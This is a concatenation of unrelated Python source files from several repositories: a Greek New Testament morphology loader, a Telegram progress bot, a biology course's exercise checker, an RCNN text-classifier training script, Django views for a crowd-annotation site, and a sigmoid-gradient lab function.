('21' , BookNames('1Pe', '1P')),
('22' , BookNames('2Pe', '2P')),
('23' , BookNames('1Jn', '1Jn')),
('24' , BookNames('2Jn', '2Jn')),
('25' , BookNames('3Jn', '3Jn')),
('26' , BookNames('Jud', 'Jude')),
('27' , BookNames('Re', 'Ap'))])
def morphgnt_filename(book_id):
"""
return the MorphGNT filename of the given book id.
    e.g. "01" will return "sblgnt/61-Mt-morphgnt.txt"
    book_id is supposed to be one of sblgnt_books' keys (i.e. a string)
Fork from py-sblgnt by jtauber distributed under a MIT Licence (https://github.com/morphgnt/py-sblgnt)
"""
return "sblgnt/{}-{}-morphgnt.txt".format(
60 + int(book_id), sblgnt_books[book_id][0]
)
def morphgnt_rows(book_id):
"""
yield a dict for each MorphGNT/SBLGNT row in the given book id.
Fork from py-sblgnt by jtauber distributed under a MIT Licence (https://github.com/morphgnt/py-sblgnt)
"""
filename = os.path.join(
os.path.dirname(__file__),
morphgnt_filename(book_id),
)
with open(filename) as f:
for line in f:
yield dict(zip(
(
"bcv", "ccat-pos", "ccat-parse", #"robinson",
"text", "word", "norm", "lemma"
),
line.strip().split()
))
``` |
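A quick sketch of consuming the parsed rows (assumes the bundled sblgnt data files are installed alongside the module):
```python
# Print the first five tokens of Matthew with their lemmas.
for i, row in enumerate(morphgnt_rows('01')):
    print(row['bcv'], row['text'], row['lemma'])
    if i == 4:
        break
```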
{
"source": "a2ohm/ProgressBot",
"score": 3
} |
#### File: a2ohm/ProgressBot/ProgressBot.py
```python
import emoji
import telepot
import traceback
from datetime import datetime, timedelta
class ProgressBot:
def __init__(self, task = "", updates = (0.1, 5*60)):
"""Init the bot."""
# Load the config file
self.loadConfig()
# Save parameters
self.task = task
self.update_percent_rate = updates[0]
self.update_time_rate = updates[1]
# Create the bot
self.bot = telepot.Bot(self.token)
# Create intern flags
self.F_pause = False
# F_silentMode: stay silent until the first tick. This is a
# trick to ignore commands send between two
# runs.
self.F_silentMode = True
# F_mute: turn it on to mute tick reports.
self.F_mute = False
def __enter__(self):
msg = "Hello, I am looking on a new task: <b>{task}</b>.".format(
task = self.task)
self.sendMessage(msg)
# Init the progress status
self.progress = 0
self.start_time = datetime.now()
self.last_percent_update = 0
self.last_time_update = self.start_time
# Start the message loop
# note: incoming message will be ignore until the first tick
# (in order to flush messages sent between two tasks)
self.bot.message_loop(self.handle)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is KeyboardInterrupt:
msg = "The task <b>{task}</b> was interrupted. :confounded_face:".format(
task = self.task)
else:
msg = "The task <b>{task}</b> is complete. :grinning_face_with_smiling_eyes:".format(
task = self.task)
self.sendMessage(msg)
return True
def loadConfig(self):
with open('./ProgressBot.cfg', 'r') as f:
for line in f.readlines():
if line[0] == '#':
continue
parsed_line = line.split('=')
if parsed_line[0] == 'token':
if len(parsed_line) == 2:
self.token = parsed_line[1].strip()
else:
                        raise ValueError("Please provide a valid token in ProgressBot.cfg")
if parsed_line[0] == 'chat_id':
if len(parsed_line) == 2:
self.chat_id = parsed_line[1].strip()
else:
# If the chat_id is empty, maybe it is because
# it is still unknown.
                        print("Hello, you didn't provide any chat_id. Maybe you do not know it. The get_chat_id script in the tools directory may help you with this issue.")
raise ValueError("You have to provide a valid chat_id, use the get_chat_id script to get help with that.")
def sendMessage(self, msg):
# Emojize the message
msg = emoji.emojize(msg)
self.bot.sendMessage(self.chat_id, msg, parse_mode = "HTML")
def handle(self, msg):
content_type, chat_type, chat_id = telepot.glance(msg)
if not self.F_silentMode and content_type == 'text':
if msg['text'] == '/pause':
print("Task: pause")
self.F_pause = True
self.send_status(cmt = "pause")
elif msg['text'] == '/resume':
print("Task: resume")
self.F_pause = False
self.send_status(cmt = "resume")
elif msg['text'] == '/status':
self.send_status()
elif msg['text'] == '/mute':
self.F_mute = True
elif msg['text'] == '/unmute':
self.F_mute = False
# API
def info(self, msg):
msg = '<b>[Info]</b> ' + msg
self.sendMessage(msg)
def warning(self, msg):
msg = ':warning_sign: <b>[Warning]</b> ' + msg
self.sendMessage(msg)
def error(self, msg, force = True):
msg = ':fearful_face: <b> [Error]</b> ' + msg
self.sendMessage(msg)
def tick(self, progress):
# Turn off the silentMode
self.F_silentMode = False
# Update the progress
self.progress = progress
# Freeze if paused
while self.F_pause:
time.sleep(1)
# Check if a progress update is necessary based on progress
if self.progress - self.last_percent_update >= self.update_percent_rate:
self.send_status()
# Check if a progress update is necessary based on time ellapsed
if datetime.now() - self.last_time_update >= timedelta(seconds=self.update_time_rate):
self.send_status()
def send_status(self, cmt = "", force = False):
"""Send the current status of the task."""
# Return without sending anything if mute
if self.F_mute and not force:
return
# Send the current status
if cmt:
msg = "{timestamp} − {progress:3.0f}% ({cmt})".format(
timestamp = datetime.now().strftime('%H:%M:%S'),
progress = 100*self.progress,
cmt = cmt)
else:
msg = "{timestamp} − {progress:3.0f}%".format(
timestamp = datetime.now().strftime('%H:%M:%S'),
progress = 100*self.progress)
self.sendMessage(msg)
# Update progress status
self.last_percent_update = self.progress
self.last_time_update = datetime.now()
if __name__ == '__main__':
# Demo of ProgressBot
import time
task= "Example"
with ProgressBot(task, updates = (0.2, 60)) as pbot:
#for i in range(10):
# time.sleep(1)
# pbot.tick(progress = i/10)
# Test logging functions
pbot.info('This is an info.')
pbot.warning('This is a warning.')
pbot.error('This is an error.')
``` |
{
"source": "A2P2/learntools",
"score": 3
} |
#### File: learntools/python_tutorial/self_study.py
```python
from learntools.core import *
from learntools.core import tracking
import numpy as np
import matplotlib.pyplot as plt
def get_last_printed_string(i = -1):
#In is a global variable with inputs.
#global In
i = i - 1
output = In[i]
for line in reversed(output.split('\n')):
if line.startswith('print('):
string = line.replace('print(', '')[:-1]
return eval(string)
def are_strings_the_same(string1, string2):
string1_lower_no_space = string1.replace(' ', '').lower()
string2_lower_no_space = string2.replace(' ', '').lower()
if string1_lower_no_space == string2_lower_no_space:
return True
else:
return False
def get_print_output_colab(input_, **kwargs):
from google.colab import _message
nb = _message.blocking_request('get_ipynb')
for cell in nb['ipynb']['cells']:
if cell['cell_type'] == 'code':
for line in cell['source']:
if line.lower().startswith(input_):
#selects the string between parentheses in print()
print_str = line[line.find("(")+1:line.rfind(")")]
#print_str = line[6:-1]
output = eval(print_str, kwargs)
return output
class RNALength(EqualityCheckProblem):
_vars = ['RNA_length']
_hint = "Use the function len()."
_solution = CS('We do not provide the solution here')
correct_RNA = 'ACACGUCCAACUCAGUUUGCCUGUUUUACAGGUUCGCGACGUGCUCGUACGUGGCUUUGGAGACUCCGUGGAGGAGGUCUUAUCAGAGGCACGUCAACAUCUUAAAGAUGGCACUUGUGGCUUAGUAGAAGUUGAAAAAGGCGUUUUGCCUCAACUUGAACAGCCCUAUGUGUUCAUCAAACGUUCGGAUGCUCGAACUGCACCUCAUGGUCAUGUUAUGGUUGAGCUGGUGCAGAACUCGAAGGCAUUCAGUACGGUCGUAGUGGUGAGACACUUGGUGUCCUUGUCCCUCAUGUGGGCGAAAUACCAGUGGCUUACCGCAAGGUUCUUCUUCGUAAGAACGGUAAUAAAGGAGCUGGUGGCCAUAGUUACGGCGCCGAUCUAA'
_expected = len(correct_RNA)
class ArrayOperations(EqualityCheckProblem):
_vars = ['x_array', 'y_array', 'figure_2']
    _hint = "You can first create a range using the function range(start, end, step). Then convert it to a numpy array by passing the range to the np.array() function."
_solution = CS('We do not provide the solution here')
def check(self, x_array, y_array, fig):
import matplotlib
import matplotlib.pyplot as plt
correct_x = np.array(range(0,31,1))
correct_y = (correct_x*3)**2
assert isinstance(x_array, np.ndarray) and isinstance(y_array, np.ndarray), (
"`x_array` and `y_array` should be numpy arrays, not ({}, {})".format(type(x_array), type(y_array))
)
assert (x_array == correct_x).all(), ("Your `x_array` is not correct. Reminder: it should contain all integers between 0 and 30, including 0 and 30.")
assert (y_array == correct_y).all(), ("Your `y_array` is not correct. Check if you have performed all calculations correctly.")
        assert isinstance(fig, type(plt.figure())), ("Check if your line for storing the plot in a variable is correct; you now have a {} and not a matplotlib figure".format(type(fig)))
plot = fig.get_axes()[0]
assert len(plot.get_lines()) == 1, "You should have plotted only one line"
x = plot.get_lines()[0].get_xdata()
y = plot.get_lines()[0].get_ydata()
assert (x == correct_x).all(), ("Check if you have correct data on the x-axis")
assert (y == correct_y).all(), ("Check if you have correct data on the y-axis")
assert 'x' == plot.get_xlabel().lower(), "You should have `x` on your x-label"
assert 'y' == plot.get_ylabel().lower(), "You should have `y` on your y-label"
class FirstLastElement(FunctionProblem):
_var = 'first_and_last'
    _hint = ('''1) Remember that Python starts counting from 0. 2) You can access the last element of a list using notation like `list_name[-1]`.''')
_solution = CS("""""")
_test_cases = [
([5,10,25,30,50], [5, 50 ]),
([1,1,1,1,1,1,1], [1,1]),
([5], [5, 5])
]
class CodonDict(EqualityCheckProblem):
_vars = ['codon_dict']
_hint = "Check how to create a dictionary in the tutorial notebook."
_solution = CS('We do not provide the solution here')
def check(self, codon_dict):
correct_dict = {'UCA' : 'Ser','GCC' : 'Ala','CGA' : 'Arg',
'UUU' : 'Phe','GGG' : 'Gly','AAG' : 'Lys',
}
shared_items = {k: correct_dict[k] for k in correct_dict if k in codon_dict and correct_dict[k] == codon_dict[k]}
correct_strings = ['Codon {} codes the {} amino acid.'.format(codon, aa) for codon, aa in correct_dict.items()]
assert len(codon_dict) == len(correct_dict), ("Your dictionary should have {} elements but it has {}"
.format(len(correct_dict), len(codon_dict)))
assert len(shared_items) == len(correct_dict), ("Your dictionary has {} elements but only {} correct elements. Check the spelling."
.format(len(codon_dict), len(shared_items)))
#TODO fix the check for printing.
# local_vars = locals()
# assert any([are_strings_the_same(correct_string, get_print_output_colab("print('c", **local_vars)) for
# correct_string in correct_strings]), ("`codon_dict` is defined correctly but the final sentence is not correct, perhaps you have a typo?")
class YeastCompetition(EqualityCheckProblem):
import matplotlib.pyplot as plt
import matplotlib
_vars = ['figure_5a']
_hint = '''Check the plotting exercise in the tutorial. You should run the function plt.plot() to plot each line
and create x and y-labels using plt.xlabel() and plt.ylabel()'''
_solution = CS('We do not provide the solution here')
def check(self, fig):
import matplotlib.pyplot as plt
import matplotlib
time = [0, 12, 24, 36, 48, 60, 72, 84, 96]
co2_strain1 = [0, 0.8, 2.5, 3.8, 4.5, 4.9, 5.0, 5.2, 5.3]
co2_strain2 = [0, 0.1, 0.3, 0.6, 1.0, 1.4, 1.8, 2.2, 2.6]
        assert isinstance(fig, type(plt.figure())), ("Check if the line storing the plot in a variable is correct; you now have an object of type {} and not a matplotlib figure".format(type(fig)))
plot = fig.get_axes()[0]
assert len(plot.get_lines()) == 2, "You should have plotted two different lines."
markers = [line.get_marker() for line in plot.get_lines()]
assert markers != ['-', '-'], "You should plot the data as points, not lines."
assert markers == ['o', 'o'], "You should plot the data as points."
for line in plot.get_lines():
x = line.get_xdata()
y = line.get_ydata()
assert (x == time).all(), ("Check if you have correct data on the x-axis")
assert any(
[
(y == co2).all() for co2 in [co2_strain1, co2_strain2]
]), ("One of the lines does not have correct data.")
assert 'time' in plot.get_xlabel().lower(), "You should have the word time with units in your x-label."
assert 'co2' in plot.get_ylabel().lower(), "You should have the word CO2 with units in your y-label."
class YeastCompetition2(EqualityCheckProblem):
import matplotlib.pyplot as plt
_vars = ['figure_5b']
_hint = "To add element to a list use the .append() function."
_solution = CS('''
    The new points are probably a measurement artifact,
since the amount of CO2 couldn't decrease biologically in this experiment.''')
def check(self, fig):
import matplotlib.pyplot as plt
time = [0, 12, 24, 36, 48, 60, 72, 84, 96, 108]
co2_strain1 = [0, 0.8, 2.5, 3.8, 4.5, 4.9, 5.0, 5.2, 5.3, 4.0]
co2_strain2 = [0, 0.1, 0.3, 0.6, 1.0, 1.4, 1.8, 2.2, 2.6, 0.3]
        assert isinstance(fig, type(plt.figure())), ("Check if the line storing the plot in a variable is correct; you now have an object of type {} and not a matplotlib figure".format(type(fig)))
plot = fig.get_axes()[0]
assert len(plot.get_lines()) == 2, "You should have plotted two different lines."
markers = [line.get_marker() for line in plot.get_lines()]
assert markers != ['-', '-'], "You should plot the data as points, not lines."
assert markers == ['o', 'o'], "You should plot the data as points."
for line in plot.get_lines():
x = line.get_xdata()
y = line.get_ydata()
assert (x == time).all(), ("Check if you have correct data on the x-axis")
assert any([(y == co2).all() for co2 in [co2_strain1, co2_strain2]]), (
"One of the lines doesn't have correct data."
)
assert 'time' in plot.get_xlabel().lower(), "You should have the word time with units in your x-label."
assert 'co2' in plot.get_ylabel().lower(), "You should have the word CO2 with units in your y-label."
class SubstrateInhibition(EqualityCheckProblem):
_vars =['michaelis_menten','mm_substrate_inhibition']
_hint = ("1) Copy paste the michaelis_menten fucntion from the tutorials. Use it as a basis for the substrate_inhibition function."
"2) Be careful with the order of math operations. "
"3) Pay attention to the order of the input arguments (S, Vmax, Km, Kinh)")
_solution = CS("""""")
    def check(self, mm, substrate_inhibition):
def correct_substrate_inhibition(S, Vmax, Km, Kinh):
v = Vmax * S / (Km + S * (1 + S / Kinh))
return round(v,2)
def correct_mm(S, Vmax, Km):
v = Vmax * S / (Km + S)
return round(v,2)
assert (round(mm(50, 100, 5),2) == correct_mm(50, 100, 5)), "Check your `michaelis_menten` function"
assert (round(mm(10, 50, 25),2) == correct_mm(10, 50, 25)), "Check your `michaelis_menten` function"
        assert (round(substrate_inhibition(1, 10, 0.2, 5), 2) == correct_substrate_inhibition(1, 10, 0.2, 5)), "Check your `mm_substrate_inhibition` function"
        assert (round(substrate_inhibition(10, 50, 5, 5), 2) == correct_substrate_inhibition(10, 50, 5, 5)), "Check your `mm_substrate_inhibition` function"
class SubstrateInhibitionPlots(EqualityCheckProblem):
import matplotlib.pyplot as plt
_var = 'figure_6b'
_hint = '''Use a numpy array (np.array) to define the substrate range. If you get stuck with plotting check how it was done in the tutorial.'''
_solution = CS("""
    Substrate inhibition kinetics achieves a flatter response in certain substrate ranges. \n
For example, see the range from 30 μM to 50 μM. \n
    According to the standard Michaelis-Menten kinetics the rate changes from ~25 to ~35 μM/min (an increase of 40%!), \n
    while in the case of substrate inhibition kinetics the rate varies only slightly around 23 μM/min
""")
    def check(self, fig):
        import matplotlib.pyplot as plt
vmax_km_kinh = [(50, 25, None),(50, 25, 10),(50, 25, 75)]
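        # Each tuple is (Vmax, Km, Kinh); Kinh=None selects plain Michaelis-Menten kinetics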
def correct_function(S, Vmax, Km, Kinh):
            if Kinh is None:
v = Vmax * S / (Km + S)
return v
else:
v = Vmax * S / (Km + S * (1 + S / Kinh))
return v
        assert isinstance(fig, type(plt.figure())), ("Check if the line storing the plot in a variable is correct; you now have an object of type {} and not a matplotlib figure".format(type(fig)))
plot = fig.get_axes()[0]
        assert len(plot.get_lines()) == 3, "You should have plotted three different lines."
for line in plot.get_lines():
x = line.get_xdata()
y = line.get_ydata()
assert (x[0] == 0) and (x[-1] == 100), ("The first and the last points on the x-axis should be 0 and 100 respectively.")
            assert any([(abs(y - correct_function(x, Vmax, Km, Kinh)) < 0.01).all() for (Vmax, Km, Kinh) in vmax_km_kinh]), ("One of the lines does not match any of the expected kinetics curves.")
        assert plot.get_xlabel(), "You should add a proper x-label."
        assert plot.get_ylabel(), "You should add a proper y-label."
qvars = bind_exercises(globals(), [
RNALength,
ArrayOperations,
FirstLastElement,
CodonDict,
YeastCompetition,
YeastCompetition2,
SubstrateInhibition,
SubstrateInhibitionPlots,
],
var_format='ex_{n}',
var_names = ['ex_1', 'ex_2', 'ex_3','ex_4','ex_5a', 'ex_5b', 'ex_6a', 'ex_6b']
)
__all__ = list(qvars)
def count_solved_exercises(exercises = __all__):
results = []
for ex in exercises:
if ex.startswith('ex'):
try:
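                # Each bound exercise object records the outcome of its last check() call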
result = eval(ex + "._last_outcome")
if result == tracking.OutcomeType.PASS:
results.append('Correct')
else:
results.append('Not correct or not solved')
except:
pass
return results.count('Correct')
feedback_options = {(8,8) : "Really great job!",
(5,7) : "You did a good job! You could try a bit more and maybe ask advice from teaching assistants or fellow students to get everything done.",
(1,5) : "You have solved some exercises. Perhaps you need to spend more time with the exercises or ask for help from teaching assistants or fellow students to get a better understanding.",
(0,0) : "You haven not solved any exercises. Please study more."}
def get_final_result():
number_solved = count_solved_exercises()
for (grade_min, grade_max) in feedback_options.keys():
if (number_solved >=grade_min) and (number_solved <=grade_max):
feedback = feedback_options[(grade_min, grade_max)]
print("You have got {} out of {} points".format(number_solved, 8))
print(feedback)
break
```
{
"source": "a2un/CS3710-Course-Project",
"score": 2
} |
#### File: a2un/CS3710-Course-Project/main.py
```python
import os
import argparse
import logging
import random
import numpy as np
import torch
from torch.utils.data import DataLoader, random_split
from build_vocab import build_dictionary
from dataset import CustomTextDataset, collate_fn
from model import RCNN
from trainer import train, evaluate
from utils import read_file
import pandas as pd
from sklearn.model_selection import train_test_split
from os import path,mkdir
import matplotlib.pyplot as plt
logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO)
logger = logging.getLogger(__name__)
def set_seed(args):
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
def setup_data():
dest_path = './data'
df = pd.read_csv(path.join(dest_path,'all_data.csv'))
train, test = train_test_split(df, test_size=0.2,random_state=42)
train.to_csv(open(path.join(dest_path,'train.csv'),'w+',encoding='utf-8',errors='ignore'),index=False)
test.to_csv(open(path.join(dest_path,'test.csv'),'w+',encoding='utf-8',errors='ignore'),index=False)
def main(args):
acc_list = []
f1_score_list = []
prec_list = []
recall_list = []
for i in range(10):
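        # Repeat the full train/evaluate pipeline 10 times; the metrics are averaged below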
setup_data()
model = RCNN(vocab_size=args.vocab_size,
embedding_dim=args.embedding_dim,
hidden_size=args.hidden_size,
hidden_size_linear=args.hidden_size_linear,
class_num=args.class_num,
dropout=args.dropout).to(args.device)
if args.n_gpu > 1:
model = torch.nn.DataParallel(model, dim=0)
train_texts, train_labels = read_file(args.train_file_path)
word2idx,embedding = build_dictionary(train_texts, args.vocab_size, args.lexical, args.syntactic, args.semantic)
logger.info('Dictionary Finished!')
full_dataset = CustomTextDataset(train_texts, train_labels, word2idx, args)
num_train_data = len(full_dataset) - args.num_val_data
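        # Hold out args.num_val_data examples for validation; the rest are used for training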
train_dataset, val_dataset = random_split(full_dataset, [num_train_data, args.num_val_data])
train_dataloader = DataLoader(dataset=train_dataset,
collate_fn=lambda x: collate_fn(x, args),
batch_size=args.batch_size,
shuffle=True)
valid_dataloader = DataLoader(dataset=val_dataset,
collate_fn=lambda x: collate_fn(x, args),
batch_size=args.batch_size,
shuffle=True)
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)
train(model, optimizer, train_dataloader, valid_dataloader, embedding, args)
logger.info('******************** Train Finished ********************')
# Test
if args.test_set:
test_texts, test_labels = read_file(args.test_file_path)
test_dataset = CustomTextDataset(test_texts, test_labels, word2idx, args)
test_dataloader = DataLoader(dataset=test_dataset,
collate_fn=lambda x: collate_fn(x, args),
batch_size=args.batch_size,
shuffle=True)
model.load_state_dict(torch.load(os.path.join(args.model_save_path, "best.pt")))
_, accuracy, precision, recall, f1, cm = evaluate(model, test_dataloader, embedding, args)
logger.info('-'*50)
logger.info(f'|* TEST SET *| |ACC| {accuracy:>.4f} |PRECISION| {precision:>.4f} |RECALL| {recall:>.4f} |F1| {f1:>.4f}')
logger.info('-'*50)
logger.info('---------------- CONFUSION MATRIX ----------------')
            for row in range(len(cm)):
                logger.info(cm[row])
logger.info('--------------------------------------------------')
acc_list.append(accuracy/100)
prec_list.append(precision)
recall_list.append(recall)
f1_score_list.append(f1)
avg_acc = sum(acc_list)/len(acc_list)
avg_prec = sum(prec_list)/len(prec_list)
avg_recall = sum(recall_list)/len(recall_list)
avg_f1_score = sum(f1_score_list)/len(f1_score_list)
logger.info('--------------------------------------------------')
logger.info(f'|* TEST SET *| |Avg ACC| {avg_acc:>.4f} |Avg PRECISION| {avg_prec:>.4f} |Avg RECALL| {avg_recall:>.4f} |Avg F1| {avg_f1_score:>.4f}')
logger.info('--------------------------------------------------')
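    # Plot the metric values from each of the 10 repetitions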
    plot_df = pd.DataFrame({'x_values': range(10), 'acc': acc_list, 'prec': prec_list, 'recall': recall_list, 'f1_score': f1_score_list})
    plt.plot('x_values', 'acc', data=plot_df, marker='o', markerfacecolor='blue', markersize=12, color='skyblue', linewidth=4)
    plt.plot('x_values', 'prec', data=plot_df, marker='', color='olive', linewidth=2)
    plt.plot('x_values', 'recall', data=plot_df, marker='', color='olive', linewidth=2, linestyle='dashed')
    plt.plot('x_values', 'f1_score', data=plot_df, marker='', color='olive', linewidth=2, linestyle='dashed')
plt.legend()
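    # Name the output figure after the combination of feature flags in use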
fname = 'lexical-semantic-syntactic.png' if args.lexical and args.semantic and args.syntactic \
else 'semantic-syntactic.png' if args.semantic and args.syntactic \
else 'lexical-semantic.png' if args.lexical and args.semantic \
else 'lexical-syntactic.png'if args.lexical and args.syntactic \
else 'lexical.png' if args.lexical \
else 'syntactic.png' if args.syntactic \
else 'semantic.png' if args.semantic \
else 'plain.png'
    if not path.exists('./images'):
mkdir('./images')
plt.savefig(path.join('./images',fname))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=42)
parser.add_argument('--test_set', action='store_true', default=False)
# data
parser.add_argument("--train_file_path", type=str, default="./data/train.csv")
parser.add_argument("--test_file_path", type=str, default="./data/test.csv")
parser.add_argument("--model_save_path", type=str, default="./model_saved")
parser.add_argument("--num_val_data", type=int, default=10000)
parser.add_argument("--max_len", type=int, default=64)
parser.add_argument("--batch_size", type=int, default=64)
parser.add_argument("--lexical", dest='lexical', action='store_true',default=False)
parser.add_argument("--syntactic", dest='syntactic', action='store_true', default=False)
parser.add_argument("--semantic", dest='semantic', action='store_true', default=False)
# model
parser.add_argument("--vocab_size", type=int, default=8000)
parser.add_argument("--embedding_dim", type=int, default=300)
parser.add_argument("--hidden_size", type=int, default=512)
parser.add_argument("--hidden_size_linear", type=int, default=512)
parser.add_argument("--class_num", type=int, default=4)
parser.add_argument("--dropout", type=float, default=0.0)
# training
parser.add_argument("--epochs", type=int, default=10)
parser.add_argument("--lr", type=float, default=3e-4)
args = parser.parse_args()
args.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
args.n_gpu = torch.cuda.device_count()
set_seed(args)
main(args)
```
{
"source": "A2Zadeh/CMU-Crowd",
"score": 2
} |
#### File: main/views/workers.py
```python
from django.contrib.auth import login
from django.shortcuts import redirect,render
from django.views.generic import CreateView
from main.models import User,Job,Annotation,Batch,Worker
from ..forms import WorkerSignUpForm
from django.template import Context, Template
from django.conf import settings
import json
import pdb
class WorkerSignUpView(CreateView):
model = User
form_class = WorkerSignUpForm
template_name = 'registration/signup_form.html'
def get_context_data(self, **kwargs):
kwargs['user_type'] = 'worker'
return super().get_context_data(**kwargs)
def form_valid(self, form):
user = form.save()
return redirect('accounts/login')
def dash(request):
worker = Worker.objects.get(user=request.user)
work_done = Annotation.objects.filter(worker=worker).count()
context = {'work_done':work_done,
'last_job': None,
'admin_email':settings.CONTACT_EMAIL
}
if work_done > 0:
last_job_done = Annotation.objects.filter(worker=worker).last().batch.job
context['last_job'] = last_job_done
return render(request, 'main/workers/dash.html', context)
def view_jobs(request):
jobs = Job.objects.all()
context = {"jobs":jobs}
return render(request, 'main/workers/view_jobs.html', context)
def view_annotations(request):
worker = Worker.objects.get(user=request.user)
annotations = Annotation.objects.filter(worker=worker)
context = {"annotations":annotations}
return render(request,'main/workers/view_annotations.html', context)
def batches_complete(job):
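    # A job is finished once every one of its batches is either completed or cancelled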
batches = Batch.objects.filter(job=job)
done = [b.is_completed or b.is_cancelled for b in batches]
return all(done)
def jobs(request, job_id):
job = Job.objects.get(id=job_id)
if batches_complete(job):
return render(request, 'main/workers/job_complete.html')
template_url = job.html_template.url
render_url = template_url.replace("/media/", "") #remove /media/ prefix
    # Oldest batch that is neither completed nor cancelled
current_batch = (Batch.objects.filter(job=job).filter(is_completed=False)
.filter(is_cancelled=False).first())
batch_content = json.loads(current_batch.content)
if request.method == 'POST':
content_dict = {k: v for k, v in request.POST.items()
if k != 'csrfmiddlewaretoken'} #remove csrftoken
worker = Worker.objects.get(user=request.user)
#Create annotation object
Annotation.objects.create(
worker=worker,
batch=current_batch,
batch_content_index=current_batch.num_completed,
content=json.dumps(content_dict),
)
current_batch.num_completed += 1
current_batch.save()
        if current_batch.num_completed == current_batch.num_HITs:
            current_batch.is_completed = True
            current_batch.save()
            # The batch just finished: move on to the next open batch (or the
            # completion page) instead of indexing past the end of batch_content
            if batches_complete(job):
                return render(request, 'main/workers/job_complete.html')
            current_batch = (Batch.objects.filter(job=job).filter(is_completed=False)
                             .filter(is_cancelled=False).first())
            batch_content = json.loads(current_batch.content)
    context = batch_content[current_batch.num_completed]
    return render(request, render_url, context)
```
{
"source": "A2Zntu/ML_HW",
"score": 4
} |
#### File: ML_HW/Lab4/sigmoidGradient.py
```python
from sigmoid import sigmoid
import numpy as np
def sigmoidGradient(z):
#SIGMOIDGRADIENT returns the gradient of the sigmoid function
#evaluated at z
# g = SIGMOIDGRADIENT(z) computes the gradient of the sigmoid function
# evaluated at z. This should work regardless if z is a matrix or a
# vector. In particular, if z is a vector or matrix, you should return
# the gradient for each element.
# The value g should be correctly computed by your code below.
g = 0
# ====================== YOUR CODE HERE ======================
# Instructions: Compute the gradient of the sigmoid function evaluated at
# each value of z (z can be a matrix, vector or scalar).
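    # The sigmoid derivative satisfies g(z) = sigmoid(z) * (1 - sigmoid(z)),
    # which holds elementwise, so one expression covers scalars, vectors and matrices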
    g = sigmoid(z) * (1 - sigmoid(z))
# =============================================================
return g
```